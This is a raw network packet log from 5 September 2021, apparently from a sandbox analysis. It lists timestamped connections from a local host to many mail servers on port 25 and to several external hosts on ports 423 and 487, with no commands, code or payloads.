Sep 5, 2021 15:50:27.828821898 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:27.882595062 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.066672087 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.139727116 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.146305084 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:28.153779030 CEST	49899	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.173465014 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.173485994 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.173491955 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.173501968 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.173511982 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.173578024 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:28.200737953 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.211131096 CEST	49900	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:28.211652040 CEST	49906	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:28.233875990 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.235738993 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.249717951 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.250293016 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.255872965 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.266777992 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.266824007 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.266906023 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:28.273905039 CEST	49899	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.278776884 CEST	423	49906	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:28.278856993 CEST	49906	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:28.283473015 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:28.285769939 CEST	423	49900	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:28.285850048 CEST	49900	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:28.310621023 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:28.346296072 CEST	423	49906	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:28.346666098 CEST	49906	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:28.350085020 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.350183010 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.367916107 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.368788004 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.386487007 CEST	49899	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.415410042 CEST	423	49906	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:28.431241035 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:28.445686102 CEST	49901	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:28.445770979 CEST	49902	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:28.446456909 CEST	49908	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:28.447168112 CEST	49909	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:28.472183943 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:28.478189945 CEST	423	49902	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:28.478307962 CEST	49902	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:28.478569031 CEST	423	49909	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:28.478652954 CEST	49909	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:28.482259035 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.483417988 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.500646114 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.500745058 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:28.507193089 CEST	49899	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.510130882 CEST	423	49909	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:28.516737938 CEST	49909	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:28.517168999 CEST	423	49901	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:28.517327070 CEST	49901	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:28.520143986 CEST	423	49908	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:28.520268917 CEST	49908	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:28.548285007 CEST	423	49909	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:28.593967915 CEST	423	49908	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:28.601308107 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.601452112 CEST	49899	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.611192942 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.625226974 CEST	49908	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:28.625469923 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:28.639760971 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:28.639863014 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:28.695028067 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.699103117 CEST	423	49908	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:28.742049932 CEST	49903	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:28.742549896 CEST	49911	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:28.745625973 CEST	49912	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.745662928 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.749481916 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:28.749538898 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:28.767445087 CEST	423	49911	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:28.767512083 CEST	423	49903	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:28.767642975 CEST	49903	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:28.768873930 CEST	49911	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:28.794224024 CEST	423	49911	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:28.809113026 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:28.818975925 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.819030046 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.819747925 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.819938898 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.820470095 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.839807034 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:28.839993000 CEST	49912	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:28.864322901 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:28.882702112 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:28.884922981 CEST	49911	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:28.976490021 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.224773884 CEST	49911	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:29.231834888 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.231920004 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.231980085 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.232050896 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.232119083 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.232175112 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.232228041 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.232285976 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.243829012 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:29.250958920 CEST	423	49911	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:29.301368952 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.301451921 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.301665068 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.301903009 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.302021027 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.302176952 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.302426100 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.302681923 CEST	49913	25	192.168.2.4	13.94.144.32
Sep 5, 2021 15:50:29.302768946 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.308000088 CEST	49914	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:29.320242882 CEST	49904	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:29.320790052 CEST	49905	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:29.320801973 CEST	49915	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:29.321274996 CEST	49916	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:29.329885960 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:29.330172062 CEST	49913	25	192.168.2.4	13.94.144.32
Sep 5, 2021 15:50:29.359977961 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.360126972 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.360214949 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.362905025 CEST	423	49916	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:29.362936020 CEST	423	49905	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:29.363035917 CEST	49916	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:29.363084078 CEST	49905	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:29.368213892 CEST	49907	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.388672113 CEST	423	49904	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:29.388828993 CEST	49904	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:29.395345926 CEST	423	49915	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:29.395479918 CEST	49915	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:29.405208111 CEST	423	49916	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:29.411385059 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:29.412137032 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:29.430803061 CEST	25	49914	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:29.430963039 CEST	49914	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:29.437280893 CEST	487	49907	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.469238997 CEST	423	49915	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:29.476469994 CEST	49916	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:29.492125988 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:29.574111938 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:29.574736118 CEST	49916	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:29.575170994 CEST	49915	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:29.615972042 CEST	423	49916	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:29.648896933 CEST	423	49915	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:29.710719109 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:29.721440077 CEST	49917	25	192.168.2.4	217.74.65.64
Sep 5, 2021 15:50:29.721673012 CEST	49918	25	192.168.2.4	66.111.4.70
Sep 5, 2021 15:50:29.726545095 CEST	49906	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:29.727108955 CEST	49919	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:29.731874943 CEST	49913	25	192.168.2.4	13.94.144.32
Sep 5, 2021 15:50:29.743912935 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:29.745021105 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:29.745176077 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:29.745266914 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:29.760024071 CEST	49910	25	192.168.2.4	104.47.66.33
Sep 5, 2021 15:50:29.760499954 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:29.760535002 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:29.761183023 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:29.761277914 CEST	49917	25	192.168.2.4	217.74.65.64
Sep 5, 2021 15:50:29.769002914 CEST	49913	25	192.168.2.4	13.94.144.32
Sep 5, 2021 15:50:29.795305014 CEST	423	49906	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:29.795975924 CEST	49906	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:29.797656059 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:29.800621033 CEST	423	49919	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:29.800704956 CEST	49919	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:29.813234091 CEST	49913	25	192.168.2.4	13.94.144.32
Sep 5, 2021 15:50:29.825428009 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:29.825537920 CEST	49918	25	192.168.2.4	66.111.4.70
Sep 5, 2021 15:50:29.829010010 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:29.836906910 CEST	49909	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:29.837018967 CEST	49908	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:29.837439060 CEST	49920	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:29.837964058 CEST	49921	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:29.866830111 CEST	49917	25	192.168.2.4	217.74.65.64
Sep 5, 2021 15:50:29.869800091 CEST	423	49909	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:29.869901896 CEST	49909	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:29.870109081 CEST	423	49921	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:29.870214939 CEST	49921	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:29.880878925 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.882148027 CEST	423	49919	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:29.882352114 CEST	49919	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:29.882463932 CEST	49911	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:29.882934093 CEST	49923	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:29.886404991 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:29.903671980 CEST	423	49921	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:29.903908014 CEST	49921	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:29.907998085 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:29.908039093 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:29.908345938 CEST	423	49920	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:29.908453941 CEST	49920	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:29.909384012 CEST	423	49911	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:29.909462929 CEST	49911	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:29.909694910 CEST	423	49923	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:29.909760952 CEST	49923	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:29.915039062 CEST	423	49908	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:29.915101051 CEST	49908	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:29.916995049 CEST	49917	25	192.168.2.4	217.74.65.64
Sep 5, 2021 15:50:29.927378893 CEST	25	49910	104.47.66.33	192.168.2.4
Sep 5, 2021 15:50:29.934786081 CEST	423	49921	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:29.934814930 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:29.934959888 CEST	423	49923	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:29.935147047 CEST	49923	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:29.947705030 CEST	49912	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:29.949805975 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:29.949884892 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:29.955996990 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:29.957458019 CEST	423	49919	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:29.960242033 CEST	423	49923	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:29.969402075 CEST	49917	25	192.168.2.4	217.74.65.64
Sep 5, 2021 15:50:29.977472067 CEST	423	49920	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:29.977669001 CEST	49920	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:30.041814089 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:30.042534113 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:30.046719074 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:30.046861887 CEST	423	49920	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:30.051086903 CEST	49912	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:30.056400061 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.056715012 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.085952044 CEST	49915	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:30.085994005 CEST	49916	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.086644888 CEST	49924	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:30.087079048 CEST	49925	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.125511885 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.127808094 CEST	423	49916	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.127918005 CEST	49916	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.128360987 CEST	423	49925	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.128444910 CEST	49925	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.145142078 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:30.146203995 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:30.150361061 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:30.155242920 CEST	423	49924	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:30.155340910 CEST	49924	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:30.159329891 CEST	423	49915	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:30.159439087 CEST	49915	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:30.162425995 CEST	49912	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:30.168770075 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.170254946 CEST	423	49925	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.172205925 CEST	49917	25	192.168.2.4	217.74.65.64
Sep 5, 2021 15:50:30.172663927 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.172698021 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.172887087 CEST	49925	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.210274935 CEST	25	49917	217.74.65.64	192.168.2.4
Sep 5, 2021 15:50:30.210375071 CEST	49917	25	192.168.2.4	217.74.65.64
Sep 5, 2021 15:50:30.215421915 CEST	423	49925	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.224112034 CEST	423	49924	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:30.224345922 CEST	49924	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:30.241678953 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.241700888 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.242619038 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.242638111 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.257087946 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:30.257128000 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:30.278318882 CEST	49912	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:30.299096107 CEST	423	49924	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:30.299149036 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.299484015 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.299597979 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.299674034 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.299762011 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.299850941 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.299921036 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.299993038 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.300062895 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.327833891 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:30.369528055 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.369543076 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.369554043 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.370065928 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.370076895 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.370085955 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.370095968 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.370105982 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.374783993 CEST	25	49912	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:30.374881029 CEST	49912	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:30.399488926 CEST	49927	25	192.168.2.4	98.136.96.93
Sep 5, 2021 15:50:30.444587946 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.444633961 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.444729090 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.444895983 CEST	49922	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:30.513820887 CEST	487	49922	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:30.528983116 CEST	25	49927	98.136.96.93	192.168.2.4
Sep 5, 2021 15:50:30.529087067 CEST	49927	25	192.168.2.4	98.136.96.93
Sep 5, 2021 15:50:30.539706945 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:30.539813042 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:30.601583004 CEST	49919	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:30.601605892 CEST	49921	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:30.601630926 CEST	49923	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:30.602258921 CEST	49928	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:30.602741003 CEST	49929	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:30.603142023 CEST	49930	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:30.627454042 CEST	423	49923	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:30.627580881 CEST	49923	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:30.628145933 CEST	423	49929	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:30.628230095 CEST	49929	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:30.634864092 CEST	423	49930	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:30.634910107 CEST	423	49921	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:30.634990931 CEST	49921	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:30.634993076 CEST	49930	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:30.653856993 CEST	423	49929	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:30.654086113 CEST	49929	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:30.667018890 CEST	423	49930	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:30.667284966 CEST	49930	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:30.674743891 CEST	423	49928	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:30.674917936 CEST	49928	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:30.676573038 CEST	423	49919	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:30.680629015 CEST	423	49929	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:30.683072090 CEST	49919	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:30.699143887 CEST	423	49930	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:30.747293949 CEST	423	49928	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:30.747550964 CEST	49928	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:30.747653008 CEST	49920	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:30.747711897 CEST	49925	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.748431921 CEST	49931	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:30.749183893 CEST	49932	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.751605988 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:30.790143967 CEST	423	49925	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.790322065 CEST	49925	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.790628910 CEST	423	49932	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.790776968 CEST	49932	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.816764116 CEST	423	49920	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:30.816889048 CEST	49920	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:30.820172071 CEST	423	49928	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:30.824928045 CEST	423	49931	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:30.825021982 CEST	49931	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:30.832724094 CEST	423	49932	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.878045082 CEST	25	49927	98.136.96.93	192.168.2.4
Sep 5, 2021 15:50:30.882873058 CEST	49932	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.903815985 CEST	423	49931	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:30.913249016 CEST	49931	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:30.913862944 CEST	49932	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:30.914062023 CEST	49924	423	192.168.2.4	193.56.146.43
